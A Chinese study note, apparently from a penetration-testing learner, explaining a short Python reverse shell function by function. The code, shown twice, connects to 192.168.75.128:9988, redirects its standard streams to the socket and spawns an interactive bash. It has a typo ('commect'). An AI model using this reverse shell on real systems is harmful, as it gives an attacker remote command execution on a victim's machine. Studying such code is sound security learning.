前言:因为最近学习渗透时,使用python编写了一个木马,但是对里面的函数/方法功能并不了解,于是查阅资料,总算有了一定了解,于是记录下来
木马文件如下:
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.commect(("192.168.75.128",9988))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/bash","-i"])
socket
在任何类型的通信开始之前,网络应用程序都必须创建套接字
socket一般指套接字,套接字最初是为同一主机上的应用程序所创建,使得主机上运行的一个程序(又名一个进程)与另一个运行的程序进行通信。这就是所谓的进程间通信(Inter Process Communication,IPC),但是后面随着网络的不断发展,socket也在不断地更新,进而形成了现在可以实现不同主机之间进行通信的工具。
有两种类型的套接字:基于文件的和面向网络的
基于文件的套接字
家族名:AF_UNIX,(又名AF_LOCAL,在POSIX1.g标准中指定),它代表地址家族(addressfamily):UNIX。
其他比较旧的系统可能会将地址家族表示成域(domain)或协议家族(protocolfamily),并使用其缩写PF而非AF。
类似地,AF_LOCAL(在2000~2001年标准化)将代替AF_UNIX
基于网络的套接字
家族名:AF_INET,或者地址家族:因特网。另一个地址家族AF_INET6用于第6版因特网协议(IPv6)寻址。
此外,还有其他的地址家族,这些要么是专业的、过时的、很少使用的,要么是仍未实现的。在所有的地址家族之中,目前AF_INET是使用
得最广泛的
面向连接的套接字与无连接的套接字
面向连接的套接字
TCP套接字的名字SOCK_STREAM,特点:可靠,开销大
在进行通信之前必须先建立一个连接,该连接的通信提供序列化的、可靠的和不重复的数据交付,而没有记录边界。这种类型的通信也称为虚拟
电路或流套接字。
实现这种连接类型的主要协议是传输控制协议(缩写 TCP)。为了创建 TCP套接字,必须使用 SOCK_STREAM 作为套接字类型。
无连接的套接字
UDP套接字的名字SOCK_DGRAM,特点:不可靠(局网内还是比较可靠的),开销小
与虚拟电路形成鲜明对比的是数据报类型的套接字,它是一种无连接的套接字。
在通信开始之前并不需要建立连接。此时,在数据传输过程中并无法保证它的顺序性、可靠性或重复性。数据报确实保存了记录边界,这就意味
着消息是以整体发送的,而并非首先分成多个片段。实现这种连接类型的主要协议是用户数据报协议(缩写 UDP)。为了创建UDP套接字,必须
使用SOCK_DGRAM作为套接字类型。
了解了这些,**socket(socket.AF_INET,socket.SOCK_STRE)
**这句的意思这下就可以理解了
创建一个基于网络并且使用tcp协议的套接字,用于通信
我们知道同一主机的两个进程如果需要进行通讯最基本的一个前提是能够唯一的标示一个进程,在本地进程通讯中我们可以使用PID来唯一标示一个进程,但PID只在本地唯一,网络中的两个进程PID冲突几率很大,这时候我们需要另辟它径了。我们知道IP层的ip地址可以唯一标示主机,而TCP层协议和端口号可以唯一标示主机的一个进程,这样我们可以利用ip地址+协议+端口号唯一标示网络中的一个进程。
socket(socket.AF_INET,socket.SOCK_STRE)
s.commect(("192.168.75.128",9988))
于是这两句代码应运而生,IP地址(192.168.75.128),协议(tcp),端口号(9988),这样我们就可唯一标识网络中的一个进程,实现不同主机之间相互通信
os
os.dup2
os.dup2() 方法用于将一个文件描述符 fd 复制到另一个 fd2
dup2()方法语法格式如下:
os.dup2(fd, fd2);
fd – 要被复制的文件描述符
fd2 – 复制的文件描述符
fileObject.fileno()
fileno() 方法返回一个整型的文件描述符(file descriptor FD 整型),可用于底层操作系统的 I/O 操作
fileno() 方法语法如下:
fileObject.fileno();
fd1和fd2(fd1是必须存在的),如果fd2存在,就关闭fd2,然后将fd1代表的那个文件强行复制给fd2,fd2这个文件描述符不会发生变化,但是fd2指向的文件就变成了fd1指向的文件。 这个函数最大的作用是重定向。
linux shell下常用的文件描述符是:
1. 标准输入 (stdin) :代码为 0 ,使用 < 或 <<
2. 标准输出 (stdout):代码为 1 ,使用 > 或 >>
3. 标准错误输出(stderr):代码为 2 ,使用 2> 或 2>>
了解了这些,就很好理解了
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
使用fileObject.fileno()返回一个整型的文件描述符,并使用os.dup2(s.fileno(),0)把这个整型的文件描述符复制到后面的0
三个dup2函数先后将socket重定向到标准输入,标准输入,标准错误输出。
subprocess
subprocess.call
作用:执行由参数提供的命令,返回命令的状态,0或者非0
subprocess模块允许您生成新进程,连接到它们的输入/输出/错误管道,并获取它们的返回码
/bin/bash
bash是shell的一种,是linux下最常用的一种shell
subprocess.call(["/bin/bash","-i"])
生成一个新进程,并连接到交互式shell(/bin/bash)
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.commect(("192.168.75.128",9988))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/bash","-i"])
将内容整合起来,这个程序的作用是:创建一个基于网络并使用tcp协议的套接字,赋予它ip和端口号,配合tcp协议来唯一标识192.168.75.128这台主机使用9988端口的进程,建立了一个子进程,传入参数“-i”,使bash以交互模式启动。这个时候我们的输入输出都会被重定向到socket,就可以执行命令了
还可以这样理解:创建一个可交互的bash和一个到192.168.75.128的TCP连接,然后将bash的输入输出错误都重定向到在192.168.75.128占用9988端口的进程上。这样理解更简短,清晰。